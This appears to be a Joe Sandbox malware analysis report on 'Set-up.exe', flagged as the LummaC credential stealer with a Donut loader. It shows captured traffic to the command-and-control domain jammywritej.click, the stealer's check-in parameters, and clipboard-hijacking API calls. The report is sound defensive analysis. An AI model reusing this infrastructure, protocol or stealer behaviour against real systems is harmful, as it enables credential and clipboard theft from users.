2024-12-28 11:19:26 UTC	15331	OUT	Data Raw: 7e 73 92 1f 8c f0 ad 92 ee 4c 1c dd e8 cb c8 f9 cf b5 fc 2e 23 b8 98 75 f3 ae c1 5c c4 bc d2 1d 6e 8e e0 60 c1 97 dd 69 3f 4c ee db 6d 78 2f 96 b6 a5 29 a5 b4 86 d6 54 b8 5c ba b4 b9 c9 66 71 ee c7 9b 71 f4 19 47 e7 96 2d 02 27 a4 e0 5e 0b 89 6e 40 8d 91 f8 5f f0 98 0d 2e 67 3e 26 b0 2c 47 8e 44 72 66 cb 27 5c 5d 06 67 ca 97 bb 57 38 48 45 c5 90 32 36 0b a5 85 a5 4d a6 3c f5 2f 59 50 c2 ad 69 0a c4 60 2c f9 48 7c 96 a5 4d 04 49 42 d6 2f c2 b9 01 a4 5e c5 d6 0e 8b 0a f7 df 0b 0a ad 95 94 23 84 c4 a2 6f 8c 38 82 8c e6 06 e7 1c b0 19 1a 81 76 5d ab 85 79 5f 32 2e 61 f1 f1 ef 1f 0b c2 c3 82 d0 9f 34 ba 7b f0 67 21 c6 aa ff cc d6 84 ff a9 2a be e0 33 3d 01 4d b7 be a5 8d fc f7 65 62 43 b3 f5 c0 10 77 e4 d8 2b b0 38 36 c2 90 59 58 a9 72 fe 22 59 e5 dc 83 a1 59 Data Ascii: ~sL.#u\n`i?Lmx/)T\fqqG-'^n@_.g>&,GDrf'\]gW8HE26M</YPi`,H\|MIB/^#o8v]y_2.a4{g!*3=MebCw+86YXr"YY
2024-12-28 11:19:26 UTC	15331	OUT	Data Raw: af 35 4c b0 b2 7b c6 a6 de be 6d dd f1 d4 af 3f 75 b5 7f 6f 0b b2 cb 5f e0 11 45 47 de 4c 08 79 37 82 f2 ba 34 3a 69 f9 46 18 9c 84 f6 6a 4d 1b 7d 56 9d 22 14 b0 f0 2d 83 32 b3 b0 0b 53 e3 44 be 89 da 85 fa b6 4a 93 23 2c fb 53 af 01 af 1f 09 fb 23 f8 39 06 e8 e6 42 cb 28 06 a7 2c 0f ed c2 97 9f a0 e6 b1 31 90 4f 25 b2 49 d1 55 77 d1 76 f4 6c 23 80 c3 4a 6d 23 c5 76 a7 ec e2 a9 b6 0a 8e 96 60 0d b0 d0 af f5 17 af 5c f6 d3 8e ae bb 3d 44 86 e5 1b 20 0c 1e 2f a4 78 f9 ad 8a f2 bd 06 7b dd 99 5d 6b 2f 54 85 1e 1b eb dc 8f 4a bf c0 3a 82 54 9d d5 c0 a7 ae db e6 6d 3c f3 c3 db 74 f3 e3 54 cf e7 b1 14 0f bf 77 05 b4 0c 9c c1 e2 f8 c8 c6 09 7e eb 8f 61 b4 2e 09 93 ef df c4 5a d9 9d d1 84 32 3e 9f 75 7d 3d 1e 61 d2 14 cd 7c d4 9c 0b 47 45 95 28 17 fa 7f d2 bb c0 Data Ascii: 5L{m?uo_EGLy74:iFjM}V"-2SDJ#,S#9B(,1O%IUwvl#Jm#v`\=D /x{]k/TJ:Tm<tTw~a.Z2>u}=a\|GE(
2024-12-28 11:19:26 UTC	15331	OUT	Data Raw: 4a 19 cc 6c 9d 31 b4 51 3d 45 46 a6 39 b4 51 51 a3 3c d7 4c 98 d3 ea a6 9d 7f f6 5b 5f 12 aa 4d a2 38 4d 46 50 ca 30 af 44 1c f2 2e 93 6b c3 64 a1 2d 32 9f 2a 85 80 88 5d 51 20 e1 28 8b b3 ee 3f 46 64 f7 c5 b4 87 96 e2 9a eb 02 f2 5f 31 d0 39 bb 14 cb ff 1d 27 65 7f 54 5a fb 26 47 fb b6 7c 7a 80 2d a2 1c c1 20 cf ff ba 88 2b 4c b6 62 d6 78 f7 a3 54 f7 f4 87 14 49 f7 e9 4e 2d b3 1c ea b2 22 ed 6b df a9 94 13 58 3f 32 53 4a 8b ce 13 9b be 95 77 2b 87 15 fa 69 4b f6 bf 13 66 4e cc 6f 07 24 a7 d8 50 dc 57 8b 53 e1 03 ff 7a 19 ec 59 fe 50 37 fb 62 36 f2 bd 74 a3 57 f8 cb c5 6a bd 19 77 e5 59 cb 7f d0 67 ff 41 bb 46 48 cd 56 8b 76 ac 7d 63 f5 cd 94 a6 7d ec 0b 78 22 5d 98 37 1d 73 ec d6 49 97 a0 bd 6e e7 15 ad 04 3a c0 4d bb 0c 0d f5 a3 e7 82 b6 0f 9a 2d b7 99 Data Ascii: Jl1Q=EF9QQ<L[_M8MFP0D.kd-2*]Q (?Fd_19'eTZ&G\|z- +LbxTIN-"kX?2SJw+iKfNo$PWSzYP7b6tWjwYgAFHVv}c}x"]7sIn:M-
2024-12-28 11:19:29 UTC	1141	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 11:19:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cmps9i66hkn9q7d8710pu6iek0; expires=Wed, 23 Apr 2025 05:06:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C1nnUqh16fFDSC33R2rRDzvdlMhYrJx%2BtBL%2FKU30n2RZQAsbndXqjk1hl8QIaiMwzC3YhMFS0B9mKGitxQc1MTnDwvD1V%2BDQ%2FtqNyCVk5pxdgoJUPd%2BgdH1EslLtVGxuxqaZAg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9127c5ebe9de9b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1636&rtt_var=622&sent=219&recv=607&lost=0&retrans=0&sent_bytes=2841&recv_bytes=587909&delivery_rate=1746411&cwnd=192&unsent_bytes=0&cid=c55332acda694f22&ts=3601&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	104.21.87.112	443	5356	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 11:19:31 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: jammywritej.click
2024-12-28 11:19:31 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 71 59 75 45 46 42 2d 2d 26 6a 3d 26 68 77 69 64 3d 35 41 30 43 31 31 37 35 42 42 42 42 34 32 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 Data Ascii: act=get_message&ver=4.0&lid=qYuEFB--&j=&hwid=5A0C1175BBBB4217BCFD68B774EF9B7A
2024-12-28 11:19:32 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 11:19:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vd61co5ns062esbk1i8kc480ul; expires=Wed, 23 Apr 2025 05:06:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VjcjhcIX8tA%2BHFt8rijDRPS7CzRG4M4FpvkUCToawQdGcC6L0hFF0Y%2BcsppgwjCdEagTIszFSqb8P4SrVTU59NB5Bgs4oOuo5h7mt79UL3GQyYrXs81p99%2FM69oRs1KnPiVtCA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9127e91a45ef9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1783&rtt_var=674&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=978&delivery_rate=1615938&cwnd=219&unsent_bytes=0&cid=12da7f083ff4d5d6&ts=791&x=0"
2024-12-28 11:19:32 UTC	240	IN	Data Raw: 31 33 38 31 0d 0a 52 30 76 38 78 55 4a 70 61 73 4b 6f 43 4d 76 75 5a 2f 5a 56 35 52 58 74 72 2b 45 33 43 46 47 67 2b 54 53 45 35 76 66 36 49 2f 49 63 4d 4e 36 6a 4e 6b 74 51 38 34 51 71 72 73 78 64 78 33 6e 48 63 63 2b 56 77 77 64 75 49 63 65 6c 47 39 44 65 68 59 39 7a 79 7a 51 2f 6b 76 30 4b 49 69 44 78 37 46 69 66 32 56 36 66 46 49 4e 4d 73 59 43 73 41 7a 77 4c 32 59 78 77 39 39 4f 34 6c 42 75 44 64 53 69 54 68 79 68 51 4f 71 76 64 50 4a 66 42 56 5a 39 6e 67 32 4b 4f 77 49 39 55 52 57 6a 77 6a 77 62 4e 70 4d 36 51 47 34 67 74 4c 4a 4b 4f 64 69 59 51 71 5a 35 75 73 70 77 44 76 6d 4f 38 52 64 33 7a 7a 6e 77 2f 4f 2f 7a 57 56 73 69 38 71 39 56 68 69 79 34 76 69 37 39 79 51 6a 62 74 38 57 2b 44 33 44 65 4d 47 71 Data Ascii: 1381R0v8xUJpasKoCMvuZ/ZV5RXtr+E3CFGg+TSE5vf6I/IcMN6jNktQ84Qqrsxdx3nHcc+VwwduIcelG9DehY9zyzQ/kv0KIiDx7Fif2V6fFINMsYCsAzwL2Yxw99O4lBuDdSiThyhQOqvdPJfBVZ9ng2KOwI9URWjwjwbNpM6QG4gtLJKOdiYQqZ5uspwDvmO8Rd3zznw/O/zWVsi8q9Vhiy4vi79yQjbt8W+D3DeMGq
2024-12-28 11:19:32 UTC	1369	IN	Data Raw: 70 53 6a 74 32 47 41 46 67 6a 30 4b 55 62 7a 35 4c 45 30 58 75 54 66 7a 48 58 6f 7a 45 39 49 49 7a 73 5a 76 36 69 55 70 51 73 76 55 4f 37 79 71 35 47 51 44 54 52 6b 67 4c 6f 72 62 57 52 51 70 68 33 47 37 43 50 4c 43 51 68 72 70 70 76 67 4c 63 76 78 7a 75 72 66 72 6a 56 68 33 4a 62 4e 64 50 4a 52 4d 57 43 6f 73 39 76 67 52 34 39 6e 70 77 34 41 77 33 78 79 6d 65 45 6c 46 54 41 4e 39 64 6e 69 50 69 79 64 45 49 2b 2f 4e 5a 2f 73 34 79 72 31 55 47 2b 48 52 66 54 68 33 6f 41 44 72 58 36 66 2f 71 79 53 4c 38 4d 72 53 65 69 31 61 35 34 54 7a 4c 49 6e 67 50 4c 73 6f 65 6d 44 4c 6b 7a 65 35 6d 31 4a 54 56 46 6c 70 41 2f 76 72 35 65 68 53 47 4c 4c 61 58 6b 71 77 52 4d 48 66 54 4f 51 4f 32 6e 6b 61 4e 2f 33 54 52 2f 79 4a 77 52 48 43 36 78 6e 55 65 6c 31 68 62 46 44 Data Ascii: pSjt2GAFgj0KUbz5LE0XuTfzHXozE9IIzsZv6iUpQsvUO7yq5GQDTRkgLorbWRQph3G7CPLCQhrppvgLcvxzurfrjVh3JbNdPJRMWCos9vgR49npw4Aw3xymeElFTAN9dniPiydEI+/NZ/s4yr1UG+HRfTh3oADrX6f/qySL8MrSei1a54TzLIngPLsoemDLkze5m1JTVFlpA/vr5ehSGLLaXkqwRMHfTOQO2nkaN/3TR/yJwRHC6xnUel1hbFD
2024-12-28 11:19:32 UTC	1369	IN	Data Raw: 69 32 47 64 2b 59 2b 6d 37 44 65 37 65 6a 5a 42 4c 6e 41 78 2f 73 37 38 70 58 77 79 37 32 6d 79 44 32 44 36 6d 5a 62 6b 36 70 70 69 4c 61 79 63 7a 37 4b 4e 6f 71 36 53 4f 6b 30 65 46 50 58 76 58 6d 57 30 77 44 59 71 61 57 4c 47 68 4b 4c 45 32 6c 33 4c 61 34 4c 56 48 56 48 37 72 6a 51 54 69 6c 70 43 6d 44 4b 5a 2f 4f 59 6d 56 65 78 6f 65 72 4a 42 41 67 4b 52 55 73 67 57 78 49 74 54 47 6f 46 46 52 44 59 2b 30 41 4c 43 38 6a 6f 39 6e 67 58 49 45 6b 76 30 7a 57 6a 6a 70 78 55 7a 79 76 68 36 44 59 62 6b 36 33 39 62 54 55 58 38 79 7a 35 64 58 79 64 2b 6e 6a 42 47 37 42 58 4b 57 2f 54 67 44 41 71 7a 6a 50 49 53 55 44 4d 41 7a 6e 47 65 4a 35 39 64 75 57 47 48 38 31 6e 2b 7a 6a 4b 76 56 51 62 34 64 46 39 4f 48 4f 77 41 4f 74 64 49 34 34 4c 4a 49 72 7a 4b 74 4a 37 Data Ascii: i2Gd+Y+m7De7ejZBLnAx/s78pXwy72myD2D6mZbk6ppiLaycz7KNoq6SOk0eFPXvXmW0wDYqaWLGhKLE2l3La4LVHVH7rjQTilpCmDKZ/OYmVexoerJBAgKRUsgWxItTGoFFRDY+0ALC8jo9ngXIEkv0zWjjpxUzyvh6DYbk639bTUX8yz5dXyd+njBG7BXKW/TgDAqzjPISUDMAznGeJ59duWGH81n+zjKvVQb4dF9OHOwAOtdI44LJIrzKtJ7
2024-12-28 11:19:32 UTC	1369	IN	Data Raw: 54 41 44 6f 69 67 48 4c 69 4d 2b 4c 45 71 45 49 65 62 65 5a 62 52 38 6b 68 4f 42 68 2b 6f 74 53 6a 78 66 54 65 64 37 48 72 31 56 2b 41 50 65 36 55 4e 43 6f 6a 35 42 43 6b 51 55 36 74 4c 41 79 58 54 2b 55 39 43 66 38 67 31 47 56 59 5a 4a 41 67 4f 57 6c 44 31 6b 7a 37 4b 4e 6f 71 36 57 39 77 78 47 43 4a 58 79 36 73 51 73 4d 4c 6f 2f 4f 63 6f 53 68 4b 4b 49 43 6e 31 69 33 2f 71 31 64 5a 42 54 48 6e 6d 50 69 70 35 43 6f 52 5a 77 58 50 5a 4c 78 4c 68 6f 36 6d 74 70 59 68 6f 63 4a 74 78 47 6e 51 4c 54 6d 68 57 55 36 5a 73 36 41 63 38 6d 72 6c 71 68 36 74 68 45 42 6e 37 42 37 55 46 72 31 34 32 43 4b 32 7a 43 37 5a 62 4e 6a 68 2f 65 34 58 45 78 70 7a 36 46 6d 35 6f 36 30 73 6b 36 46 4a 54 76 45 39 41 6f 52 4a 36 7a 71 54 50 2b 6e 4c 62 63 6b 30 30 62 62 6c 39 45 Data Ascii: TADoigHLiM+LEqEIebeZbR8khOBh+otSjxfTed7Hr1V+APe6UNCoj5BCkQU6tLAyXT+U9Cf8g1GVYZJAgOWlD1kz7KNoq6W9wxGCJXy6sQsMLo/OcoShKKICn1i3/q1dZBTHnmPip5CoRZwXPZLxLho6mtpYhocJtxGnQLTmhWU6Zs6Ac8mrlqh6thEBn7B7UFr142CK2zC7ZbNjh/e4XExpz6Fm5o60sk6FJTvE9AoRJ6zqTP+nLbck00bbl9E
2024-12-28 11:19:32 UTC	654	IN	Data Raw: 36 74 4e 7a 71 32 50 6d 42 50 44 4e 67 79 36 70 77 4d 4e 4f 2f 48 69 52 37 79 76 42 49 59 51 6c 48 2b 76 35 62 68 7a 49 78 7a 58 73 51 53 30 30 62 61 79 51 73 63 58 42 4a 43 4b 4d 69 6f 66 74 63 35 75 34 4b 59 32 6b 52 47 66 66 4d 62 46 68 33 67 2b 48 74 71 65 41 75 33 56 72 5a 34 57 76 42 49 52 69 66 4e 78 43 6c 75 4b 6e 6c 2f 37 70 51 58 44 45 6f 63 68 6c 35 2b 55 57 6e 49 4c 7a 4d 74 38 34 62 57 2f 76 57 79 62 45 43 6d 46 69 48 59 31 52 59 6e 63 4f 36 44 66 44 70 74 69 6c 32 65 5a 6e 4a 52 48 66 47 4b 59 73 55 57 31 75 74 69 34 55 4c 51 64 43 4c 32 6d 41 41 73 6e 36 5a 31 74 2f 71 41 47 72 43 4f 72 56 34 76 4d 74 6b 31 63 4e 64 6d 6a 64 2f 43 53 77 38 31 75 6d 54 30 61 6f 4f 6f 53 55 52 4f 70 78 30 79 66 75 53 71 6b 4f 34 78 6c 6d 34 53 57 62 7a 6f 4e Data Ascii: 6tNzq2PmBPDNgy6pwMNO/HiR7yvBIYQlH+v5bhzIxzXsQS00bayQscXBJCKMioftc5u4KY2kRGffMbFh3g+HtqeAu3VrZ4WvBIRifNxCluKnl/7pQXDEochl5+UWnILzMt84bW/vWybECmFiHY1RYncO6DfDptil2eZnJRHfGKYsUW1uti4ULQdCL2mAAsn6Z1t/qAGrCOrV4vMtk1cNdmjd/CSw81umT0aoOoSUROpx0yfuSqkO4xlm4SWbzoN
2024-12-28 11:19:32 UTC	1369	IN	Data Raw: 32 34 34 62 0d 0a 6e 6a 4b 74 54 6f 5a 41 4a 66 73 66 72 69 64 4c 62 63 67 31 69 61 44 79 4e 5a 32 4d 42 58 31 74 6b 37 59 79 59 32 30 65 70 45 6a 41 59 54 75 44 78 35 53 68 2b 74 67 2f 4b 30 44 71 6e 71 67 57 35 72 62 31 31 38 2b 4a 50 71 4f 57 50 36 77 75 6f 39 68 6c 33 56 36 6d 34 34 71 4b 31 2b 56 35 54 69 66 76 67 6d 75 44 49 35 52 31 4d 43 35 41 6e 38 5a 78 4a 30 66 73 6f 57 57 6f 78 4b 32 50 77 57 65 67 79 55 6e 49 4c 66 38 49 35 36 2b 56 34 41 42 67 53 4b 2f 39 74 64 5a 50 78 50 5a 6b 46 44 7a 6e 4d 61 6a 52 59 51 57 66 73 36 7a 4f 69 30 34 38 50 35 74 72 34 51 58 77 54 2b 4d 5a 4c 6a 6b 75 41 4a 42 4b 2f 43 6a 65 72 65 53 73 5a 42 53 6c 44 51 44 74 34 39 78 4c 54 71 55 77 43 50 79 72 78 57 76 43 63 70 51 6f 39 65 37 59 54 31 6a 30 35 4a 48 39 64 Data Ascii: 244bnjKtToZAJfsfridLbcg1iaDyNZ2MBX1tk7YyY20epEjAYTuDx5Sh+tg/K0DqnqgW5rb118+JPqOWP6wuo9hl3V6m44qK1+V5TifvgmuDI5R1MC5An8ZxJ0fsoWWoxK2PwWegyUnILf8I56+V4ABgSK/9tdZPxPZkFDznMajRYQWfs6zOi048P5tr4QXwT+MZLjkuAJBK/CjereSsZBSlDQDt49xLTqUwCPyrxWvCcpQo9e7YT1j05JH9d
2024-12-28 11:19:32 UTC	1369	IN	Data Raw: 78 53 56 39 76 5a 45 57 47 69 4b 6d 79 30 32 66 74 77 61 43 4f 49 78 2b 67 63 58 5a 58 56 52 2b 35 61 35 44 31 36 53 6a 76 6d 69 48 45 69 69 61 6b 44 4d 73 4d 72 4b 64 66 71 47 61 46 35 4e 73 71 31 71 61 2f 59 78 50 52 53 44 72 6d 6e 58 50 69 6f 47 4a 65 35 78 73 4f 6f 69 58 4d 79 59 46 2b 70 39 37 69 71 55 42 6e 69 58 63 64 72 71 59 74 56 4e 78 4f 65 4f 75 56 65 79 6b 77 70 4a 57 75 67 41 53 71 4a 52 7a 4a 51 6d 4d 33 48 43 59 70 68 53 30 50 62 6b 36 6f 38 47 48 51 6c 52 2b 78 35 4e 61 38 4e 43 34 73 6d 2b 6b 49 44 6d 56 2f 41 56 5a 44 76 66 53 63 76 36 79 53 4c 77 33 6f 53 32 69 31 6f 5a 6a 63 68 44 45 76 31 6e 4c 72 59 2b 63 65 34 45 65 4d 62 32 70 4b 42 6c 63 39 63 42 6c 38 72 6b 56 72 42 44 4f 51 34 48 68 30 6b 4e 4f 4f 39 47 66 52 38 79 74 76 63 6c Data Ascii: xSV9vZEWGiKmy02ftwaCOIx+gcXZXVR+5a5D16SjvmiHEiiakDMsMrKdfqGaF5Nsq1qa/YxPRSDrmnXPioGJe5xsOoiXMyYF+p97iqUBniXcdrqYtVNxOeOuVeykwpJWugASqJRzJQmM3HCYphS0Pbk6o8GHQlR+x5Na8NC4sm+kIDmV/AVZDvfScv6ySLw3oS2i1oZjchDEv1nLrY+ce4EeMb2pKBlc9cBl8rkVrBDOQ4Hh0kNOO9GfR8ytvcl
2024-12-28 11:19:32 UTC	1369	IN	Data Raw: 4d 2b 63 43 43 30 69 73 50 68 46 6c 38 45 75 73 54 71 4d 55 4c 79 45 71 67 42 67 61 64 47 31 52 64 4f 38 67 36 42 4b 6f 67 73 52 6a 66 63 6a 48 69 4f 67 39 43 65 71 67 52 47 58 59 59 35 58 31 59 53 79 52 31 52 2b 36 5a 35 64 73 39 47 44 6a 46 6e 41 4c 6e 79 79 73 53 30 35 58 4b 6e 68 52 76 4b 41 49 36 59 44 6a 54 36 4f 2b 61 35 45 50 53 4c 6e 71 58 2f 58 6a 62 61 65 65 62 63 73 42 70 33 38 45 53 59 48 69 63 70 39 76 71 49 70 73 47 47 39 49 59 76 49 67 6c 68 6a 4a 64 66 41 58 4c 32 66 76 72 67 61 6c 52 39 2f 6b 50 41 74 4a 79 75 6e 30 6d 50 39 69 42 36 45 41 34 4a 69 32 64 66 5a 44 6d 63 2f 78 4d 46 62 73 37 53 41 69 32 32 37 49 67 61 6f 37 6e 45 6b 4b 37 54 42 51 71 32 67 44 38 59 6c 6f 53 4f 4b 78 49 35 6d 55 67 32 50 75 6b 66 4c 72 38 4f 4f 47 35 30 67 Data Ascii: M+cCC0isPhFl8EusTqMULyEqgBgadG1RdO8g6BKogsRjfcjHiOg9CeqgRGXYY5X1YSyR1R+6Z5ds9GDjFnALnyysS05XKnhRvKAI6YDjT6O+a5EPSLnqX/XjbaeebcsBp38ESYHicp9vqIpsGG9IYvIglhjJdfAXL2fvrgalR9/kPAtJyun0mP9iB6EA4Ji2dfZDmc/xMFbs7SAi227Igao7nEkK7TBQq2gD8YloSOKxI5mUg2PukfLr8OOG50g
2024-12-28 11:19:32 UTC	1369	IN	Data Raw: 52 64 50 6f 6a 44 66 62 6d 48 49 59 38 55 70 32 2f 63 36 72 64 6c 4d 42 33 56 7a 6c 4f 7a 6f 5a 57 35 46 35 59 4c 49 5a 37 38 42 43 59 4a 6a 5a 42 47 2f 4c 77 2b 77 44 76 53 56 35 54 47 68 55 42 79 59 64 69 71 41 4f 69 70 6f 71 6f 56 74 79 4a 36 79 2f 56 37 41 67 2f 30 7a 57 61 4e 75 6c 61 5a 4d 74 4e 57 6d 4f 61 41 55 6b 49 39 79 6f 68 53 39 36 36 38 73 42 43 32 46 78 2b 36 69 53 34 6f 4d 4a 4f 63 52 62 7a 64 56 36 34 77 70 6b 47 76 32 64 59 50 54 68 33 46 72 58 44 2b 33 6f 43 62 63 35 6b 62 5a 4b 61 4f 64 78 41 38 73 64 68 52 6a 70 6f 50 70 68 53 6d 58 5a 37 32 74 51 35 46 49 2b 48 4f 66 39 7a 4e 7a 37 42 46 68 44 30 64 6b 4b 67 76 4d 41 32 62 33 32 61 75 75 6b 79 61 50 39 46 2f 72 38 75 71 5a 47 77 47 35 61 55 62 78 71 65 31 6d 42 47 56 45 51 58 58 6a Data Ascii: RdPojDfbmHIY8Up2/c6rdlMB3VzlOzoZW5F5YLIZ78BCYJjZBG/Lw+wDvSV5TGhUByYdiqAOipoqoVtyJ6y/V7Ag/0zWaNulaZMtNWmOaAUkI9yohS9668sBC2Fx+6iS4oMJOcRbzdV64wpkGv2dYPTh3FrXD+3oCbc5kbZKaOdxA8sdhRjpoPphSmXZ72tQ5FI+HOf9zNz7BFhD0dkKgvMA2b32auukyaP9F/r8uqZGwG5aUbxqe1mBGVEQXXj

Target ID:	0
Start time:	06:18:56
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0x400000
File size:	2'208'480 bytes
MD5 hash:	C906E379AACCBA4950AABDB48E533541
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1902853656.0000000001D7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	72.1%
Signature Coverage:	53.3%
Total number of Nodes:	315
Total number of Limit Nodes:	38

Executed Functions

Function 0915CC75 Relevance: 30.2, Strings: 24, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ehph, xrefs: 0915CF66
fhch, xrefs: 0915CE96
HhPh, xrefs: 0915CEEE
hh(h, xrefs: 0915CEC2
Kh^h, xrefs: 0915CF25
Rhvh, xrefs: 0915CE6A
xhdh, xrefs: 0915CE75
ph8h, xrefs: 0915CE5F
jammywritej.click, xrefs: 0915D003
`h,h, xrefs: 0915CECD
ohuh, xrefs: 0915CE54
uheh, xrefs: 0915CE8B
<h7h, xrefs: 0915CF46
0h+h, xrefs: 0915CE80
uhjh, xrefs: 0915CEB7
shoh, xrefs: 0915CEAC
yhrh, xrefs: 0915CEA1
ChYh, xrefs: 0915CF1A
RhTh, xrefs: 0915CEF9
Xh h, xrefs: 0915CF3B
^hYh, xrefs: 0915CF0F
vh}h, xrefs: 0915CE49
ehdh, xrefs: 0915CED8
FhFh, xrefs: 0915CF30

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: 0h+h$<h7h$ChYh$Ehph$FhFh$HhPh$Kh^h$RhTh$Rhvh$Xh h$^hYh$`h,h$ehdh$fhch$hh(h$jammywritej.click$ohuh$ph8h$shoh$uheh$uhjh$vh}h$xhdh$yhrh
API String ID: 0-709626919
Opcode ID: ad6f142a8ec0d6c804f1ec2df9618f6bb1ed1423496776a642b95b61f099bec7
Instruction ID: fe8aeddd88e22b810680a47f76cee6f44bf495fc00161caab897ea1c75bdf11f
Opcode Fuzzy Hash: ad6f142a8ec0d6c804f1ec2df9618f6bb1ed1423496776a642b95b61f099bec7
Instruction Fuzzy Hash: B7810FB1A0D3D08AD7308F28D98A3ABBBE1EFC6304F65496DD4C95B250EB750516CB93

Function 09187CF0 Relevance: 25.1, APIs: 9, Strings: 5, Instructions: 574
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.COMBASE(0919268C,00000000,00000001,0919267C,00000000), ref: 09187E10
SysAllocString.OLEAUT32([d), ref: 09187E93
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 09187ED1
SysAllocString.OLEAUT32(!,.,), ref: 09187F2F
SysAllocString.OLEAUT32(B6ABB756), ref: 09187FEF
VariantInit.OLEAUT32(?), ref: 0918805E
VariantClear.OLEAUT32(?), ref: 091881B1
SysFreeString.OLEAUT32(00000000), ref: 091881EE

Strings

,,Y,, xrefs: 09187EE7
W;, xrefs: 09187D37
[d, xrefs: 09187D7C
\, xrefs: 09187DCA
C, xrefs: 09187DBF

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
String ID: ,,Y,$C$W;$[d$\
API String ID: 2775254435-2867424240
Opcode ID: bdaa89e6a466ee63edc66daec5cf86764b33a59256094887e748da695d04b275
Instruction ID: f5b63f4b90c9ae7ddd8725b1decb345c15b5b761ac6863193dcf2b2663956962
Opcode Fuzzy Hash: bdaa89e6a466ee63edc66daec5cf86764b33a59256094887e748da695d04b275
Instruction Fuzzy Hash: C502B976A08300AFD710EF64C884B6BBBE6EFC5714F15882DF9A59B290D774E8418F52

Function 092C1000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000001), ref: 092C1032
OpenClipboard.USER32(00000000), ref: 092C103C
GetClipboardData.USER32(0000000D), ref: 092C104C
GlobalLock.KERNEL32(00000000), ref: 092C105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 092C1090
GlobalLock.KERNEL32 ref: 092C10A0
GlobalUnlock.KERNEL32 ref: 092C10C1
EmptyClipboard.USER32 ref: 092C10CB
SetClipboardData.USER32(0000000D), ref: 092C10D6
GlobalFree.KERNEL32 ref: 092C10E3
GlobalUnlock.KERNEL32(?), ref: 092C10ED
CloseClipboard.USER32 ref: 092C10F3
GetClipboardSequenceNumber.USER32 ref: 092C10F9

Memory Dump Source

Source File: 00000000.00000002.2912112875.00000000092C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 092C0000, based on PE: true

Associated: 00000000.00000002.2912097873.00000000092C0000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2912128468.00000000092C2000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_92c0000_Set-up.jbxd

Similarity

